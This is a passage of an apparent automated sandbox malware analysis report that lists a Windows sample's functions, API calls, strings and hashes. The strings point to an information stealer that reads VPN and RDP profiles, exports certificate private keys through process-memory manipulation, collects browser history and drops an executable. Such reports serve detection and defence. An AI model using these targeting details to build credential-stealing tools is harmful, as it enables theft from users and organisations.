                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: FileNamedPeekPipeRead
                                                                        • String ID:
                                                                        • API String ID: 327342812-0
                                                                        • Opcode ID: 096132fb93717013b3e16f88d7bf0609256235cc15a0420f845206ceb18e82a6
                                                                        • Instruction ID: 3b0d50f197b92fa516dab725f68e57cab916617572d8f3c53cd115195f230a71
                                                                        • Opcode Fuzzy Hash: 096132fb93717013b3e16f88d7bf0609256235cc15a0420f845206ceb18e82a6
                                                                        • Instruction Fuzzy Hash: 5D01AD2271825283EB10EF1AE44577AE3E0EB85BE8F944134FA488B664DF7CD4908B90
                                                                        Function 00007FF7CB8795A0 Relevance: 3.0, APIs: 2, Instructions: 39synchronizationCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: CodeExitNamedObjectPeekPipeProcessSingleWait
                                                                        • String ID:
                                                                        • API String ID: 2021502500-0
                                                                        • Opcode ID: 219911f9fbf93e8dc81b8ab5b15ed7b90f6e7e4d0e94d35a3e310abd07cbe8cc
                                                                        • Instruction ID: a7600a9eef83b2c1ff4ee82f58692b9f8c2460dbd80e9ee6a0c7e24981c2ab2a
                                                                        • Opcode Fuzzy Hash: 219911f9fbf93e8dc81b8ab5b15ed7b90f6e7e4d0e94d35a3e310abd07cbe8cc
                                                                        • Instruction Fuzzy Hash: D8018421A0865292EF50EF29D48077853D1EF44B9CF945231F90D565A9EF2DDCE5C390
                                                                        Function 00007FF7CB871A70 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 682 7ff7cb871a70-7ff7cb871ab8 call 7ff7cb871918 wvsprintfW
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: wvsprintf
                                                                        • String ID:
                                                                        • API String ID: 2795597889-0
                                                                        • Opcode ID: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
                                                                        • Instruction ID: b9d6df6b6ddbee4c94f17f7a5e20e680707219e710edbf381c98a30939e46ea5
                                                                        • Opcode Fuzzy Hash: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
                                                                        • Instruction Fuzzy Hash: 44E039B2A40B45C2D704AF19E94008CBBB5EB99FD8B948021DB481B325CF38D9A6C7A0
                                                                        Function 00007FF7CB8779C4 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 685 7ff7cb8779c4-7ff7cb8779d9 GetNativeSystemInfo 686 7ff7cb8779db-7ff7cb8779e1 685->686 687 7ff7cb8779e7 685->687 686->687 688 7ff7cb8779e3-7ff7cb8779e5 686->688 689 7ff7cb8779e9-7ff7cb8779ed 687->689 688->689
                                                                        APIs
                                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00007FF7CB8774DE), ref: 00007FF7CB8779CD
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: InfoNativeSystem
                                                                        • String ID:
                                                                        • API String ID: 1721193555-0
                                                                        • Opcode ID: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                        • Instruction ID: d95de6f083f6698a88afea1591ab43be7ce0859bf3b6ab9646dc960674082255
                                                                        • Opcode Fuzzy Hash: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                        • Instruction Fuzzy Hash: 6CD05E07C0849282DE31BF089406136A2E1BB6471CFC00231F18D024B06FADD6F9DAA5

                                                                        Non-executed Functions

                                                                        Function 00007FF7CB87DC08 Relevance: 54.7, APIs: 16, Strings: 15, Instructions: 436filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: File$Path$ExistsHeap$AppendCreateEnvironmentProcessReadSizeVariable$CombineFreeQuoteSpaceslstrcatlstrlen
                                                                        • String ID: ", "group": "$", "host": "$"user": "$</DefaultGroup>$</DefaultHostName>$</DefaultUser>$<DefaultGroup>$<DefaultHostName>$<DefaultUser>$Software\Fortinet\FortiClient\Sslvpn\Tunnels$Software\Microsoft\Terminal Server Client\Servers$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles$Software\SonicWall\SSL-VPN NetExtender\Standalone$]},$}},
                                                                        • API String ID: 2508640211-1951492331
                                                                        • Opcode ID: 948f672f832970001278ee64c14b3cd2eb97a0324b026afad294e905e837156c
                                                                        • Instruction ID: b4e215a2b1fa154bf9862ce397a5f5bbed197ee74c3442f0997fdc46d4d42a8c
                                                                        • Opcode Fuzzy Hash: 948f672f832970001278ee64c14b3cd2eb97a0324b026afad294e905e837156c
                                                                        • Instruction Fuzzy Hash: 4F12E361A1866241EA50FF29D4503FDA3E1AF857E8FC04031FA0D1BABADF2DD165C3A0
                                                                        Function 00007FF7CB873220 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 313encryptionmemorylibraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB87325E
                                                                        • CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF7CB87328D
                                                                        • CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB8732BB
                                                                          • Part of subcall function 00007FF7CB8736F0: CryptExportKey.ADVAPI32 ref: 00007FF7CB873744
                                                                          • Part of subcall function 00007FF7CB8736F0: CryptExportKey.ADVAPI32 ref: 00007FF7CB87379E
                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873336
                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873380
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB8733AC
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB8733DC
                                                                        • CryptExportKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB873404
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB87341C
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB87343F
                                                                        • CryptAcquireContextA.ADVAPI32 ref: 00007FF7CB873459
                                                                        • CryptImportKey.ADVAPI32 ref: 00007FF7CB87347E
                                                                        • OpenSCManagerA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB8734B5
                                                                        • OpenServiceA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873505
                                                                        • QueryServiceStatusEx.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873523
                                                                        • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873532
                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB87355D
                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB87357C
                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB87359F
                                                                        • NCryptExportKey.NCRYPT ref: 00007FF7CB873605
                                                                        • CertOpenStore.CRYPT32 ref: 00007FF7CB873667
                                                                        • CertAddCertificateLinkToStore.CRYPT32 ref: 00007FF7CB873682
                                                                        • CertSetCertificateContextProperty.CRYPT32 ref: 00007FF7CB87369E
                                                                        • PFXExportCertStoreEx.CRYPT32 ref: 00007FF7CB8736BD
                                                                        • PFXExportCertStoreEx.CRYPT32 ref: 00007FF7CB8736DF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Crypt$CertExport$CertificateOpenProcessProtectStoreVirtual$ContextMemory$AcquirePropertyReadService$AddressImportLibraryLinkLoadManagerPrivateProcQueryStatusUserWrite
                                                                        • String ID: /.2x$7+D$CAPIPRIVATEBLOB$Microsoft Software Key Storage Provider$ioyn
                                                                        • API String ID: 2161712720-1498425709
                                                                        • Opcode ID: a25e5b017786837144a5a0b04777f20777e85b9858ce6eb30a9eb0907d864ba2
                                                                        • Instruction ID: ca13be3653af024a19c85dea3222ef3f8b3d22f570f636c14ed9ce9937ebb881
                                                                        • Opcode Fuzzy Hash: a25e5b017786837144a5a0b04777f20777e85b9858ce6eb30a9eb0907d864ba2
                                                                        • Instruction Fuzzy Hash: 10E16C32B046518BE710EFA5E8447EEB3A1BB48798F804136EE4D27A68DF3CD159C790
                                                                        Function 00007FF7CB87213C Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 241COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Http$CloseHandle$DataHeapOpenOptionQueryRequest$AvailableConnectCrackFreeProcessReadReceiveResponseSend
                                                                        • String ID: =p"p$=p"p$>p9p
                                                                        • API String ID: 199669925-890668147
                                                                        • Opcode ID: a704e8ea3cc7e12d3e41ecaca187322a5b9e62bb98761d97aa9ec53c2d1b6b09
                                                                        • Instruction ID: 358411729c71c0eddec73b98770935befcb48ad99b693cfde3e431a4364d039e
                                                                        • Opcode Fuzzy Hash: a704e8ea3cc7e12d3e41ecaca187322a5b9e62bb98761d97aa9ec53c2d1b6b09
                                                                        • Instruction Fuzzy Hash: 3CA1E232A1839186EB10EF6AA4401A9B7E1FB89B98F940035FE4C53B68CF3DD455CB90
                                                                        Function 00007FF7CB87FB34 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 65stringfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: File$lstrcat$Close$FindHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFirstFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcpy
                                                                        • String ID: *.default-release$APPDATA$\places.sqlite
                                                                        • API String ID: 4154822446-3438982840
                                                                        • Opcode ID: e65e7b83617ab43540fe00d47d34ac815f55c605aef4560ecc047bbf39011d3b
                                                                        • Instruction ID: d0455abd4ca1f3b2c438d13c69b174e5c8711d0fe7121ea749fce2bfe9d31196
                                                                        • Opcode Fuzzy Hash: e65e7b83617ab43540fe00d47d34ac815f55c605aef4560ecc047bbf39011d3b
                                                                        • Instruction Fuzzy Hash: E9319321A1899392EF10EF18E8401E8F3A1FB447A8FC05031FA5D475B8EF6DD659C7A0
                                                                        Function 00007FF7CB87B424 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 310COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Card$CardsFreeListMemory$ChangeStatus
                                                                        • String ID: "_": ""$%02X
                                                                        • API String ID: 2879528921-1880646522
                                                                        • Opcode ID: 1469aa397842543e0f958f141cad293e1374c8fccdcf4b332ba7a061652e57d8
                                                                        • Instruction ID: f35bf232c224a2f11676fd25ae2f5a5ede517f2a1a3f17c3530aa1d5a82aa213
                                                                        • Opcode Fuzzy Hash: 1469aa397842543e0f958f141cad293e1374c8fccdcf4b332ba7a061652e57d8
                                                                        • Instruction Fuzzy Hash: 74D1B722B4862345EA40FF6998512FC93D59F85BE8BC45031FD1E676B6DF3CE1A183A0
                                                                        Function 00007FF7CB8778EC Relevance: 6.1, APIs: 4, Instructions: 56libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Process$AddressCurrentLibraryLoadProcWow64
                                                                        • String ID:
                                                                        • API String ID: 4035193891-0
                                                                        • Opcode ID: d9433cb4c0b0783edecceb738938e31f42c253bdf9f57a76c28b29cf26c91256
                                                                        • Instruction ID: 551938a3e6f3be06b21edcc0c957a23d368055908c3b374d9458540a9a5dfa40
                                                                        • Opcode Fuzzy Hash: d9433cb4c0b0783edecceb738938e31f42c253bdf9f57a76c28b29cf26c91256
                                                                        • Instruction Fuzzy Hash: 9421F262A193D283EE00AF28A40027AE7D0FB5D7A4F841235FA8C02B25DF2CC164CB90
                                                                        Function 00007FF7CB8736F0 Relevance: 3.1, APIs: 2, Instructions: 58encryptionCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: CryptExport$HeapProcess
                                                                        • String ID:
                                                                        • API String ID: 532797600-0
                                                                        • Opcode ID: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
                                                                        • Instruction ID: c707df1013618d588ccd940d676f1afc6d3f245919360a996d1d9ed6d9d2612b
                                                                        • Opcode Fuzzy Hash: 3be456bb978bd55ad68a908853d8a1957bca95cb45049c9de1117908c4c22810
                                                                        • Instruction Fuzzy Hash: B721B732A1965292EB50EF19F44037AB3E0EBC4BA8F448130FA4D577A5DF3DD4918B50
                                                                        Function 00007FF7CB87A51C Relevance: .2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f22fdfa8e974821b920fadf0c5ef20db9c8c6688bbe70ef6b624c4c461a76b7c
                                                                        • Instruction ID: 9ebdea094f5af568808e995ec257f7a6796aaeb88f75f1daf12c894f68a3b08d
                                                                        • Opcode Fuzzy Hash: f22fdfa8e974821b920fadf0c5ef20db9c8c6688bbe70ef6b624c4c461a76b7c
                                                                        • Instruction Fuzzy Hash: 61614853A082E54AE701EE3D84512F96BD1EB1679CF841134FE89A7BA7DA3CD097C360
                                                                        Function 00007FF7CB87A774 Relevance: .2, Instructions: 165COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6d01c7f7f70e755251e5213423192505223118269c658bfc9e31a8515983880f
                                                                        • Instruction ID: 4abf57650554da8b079c7e57425feee0d862d06e03ba05dd046897c02da99abb
                                                                        • Opcode Fuzzy Hash: 6d01c7f7f70e755251e5213423192505223118269c658bfc9e31a8515983880f
                                                                        • Instruction Fuzzy Hash: EE515547A082D14CEB129E3D80913ED6FA1EB253A8F854025FE99A7B47D63CD057C360
                                                                        Function 00007FF7CB87FF38 Relevance: 18.1, APIs: 12, Instructions: 91filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: File$Heap$Process$CloseHandleViewlstrlen$ByteCharCreateExistsFreeMappingMultiOpenPathSizeUnmapWide__memcpy
                                                                        • String ID:
                                                                        • API String ID: 2161876737-0
                                                                        • Opcode ID: fc837f05eaeaec11483a2d0ed697738c41b71f0394e06bed3ba4087a4e68e6b5
                                                                        • Instruction ID: cf252373969a17edfaa822b94be16872246bc04c2e7cb6503e0da1379f8aa3b6
                                                                        • Opcode Fuzzy Hash: fc837f05eaeaec11483a2d0ed697738c41b71f0394e06bed3ba4087a4e68e6b5
                                                                        • Instruction Fuzzy Hash: 8C31B221B0866283E720FF2AA858729A2D0BF89BF0F844234ED5D477B5DF3ED4558790
                                                                        Function 00007FF7CB871CBC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 65filetimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: File$Time$CloseCreateExecuteHandlePathShellSystemTempWritewsprintf
                                                                        • String ID: %08X.exe$open
                                                                        • API String ID: 2307396689-1771423410
                                                                        • Opcode ID: 5ca8c4d93bbcac26c49b5db9cd55d20708d169f99a7b767ef2df99b98dd97959
                                                                        • Instruction ID: c60ed29b11fb171a64b106f9c59609a265a8f91bc85519c714055a426341331a
                                                                        • Opcode Fuzzy Hash: 5ca8c4d93bbcac26c49b5db9cd55d20708d169f99a7b767ef2df99b98dd97959
                                                                        • Instruction Fuzzy Hash: 3C31D87264899197E720EF64E8847E9A361FB8879CFC04035EA4D46968CF7CC65CC750
                                                                        Function 00007FF7CB87F984 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 96stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: File$lstrcatlstrlen$CloseHandleHeapView__memcpy$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWide
                                                                        • String ID: Default$LOCALAPPDATA$\History
                                                                        • API String ID: 3980575106-3555721359
                                                                        • Opcode ID: 3e70a395a46a2af505291de9ab1fd73a1e68383478261f10fbcbd77587007c23
                                                                        • Instruction ID: 4a218ccb6b6c3a6c7839d29b80c70d988f030818fefd2f8792d73ffa2babedd3
                                                                        • Opcode Fuzzy Hash: 3e70a395a46a2af505291de9ab1fd73a1e68383478261f10fbcbd77587007c23
                                                                        • Instruction Fuzzy Hash: 6B514622D18F9583E751EF28D5012B873B0F798798F85A221EB8D53666EF34E6D8C340
                                                                        Function 00007FF7CB87FC6C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
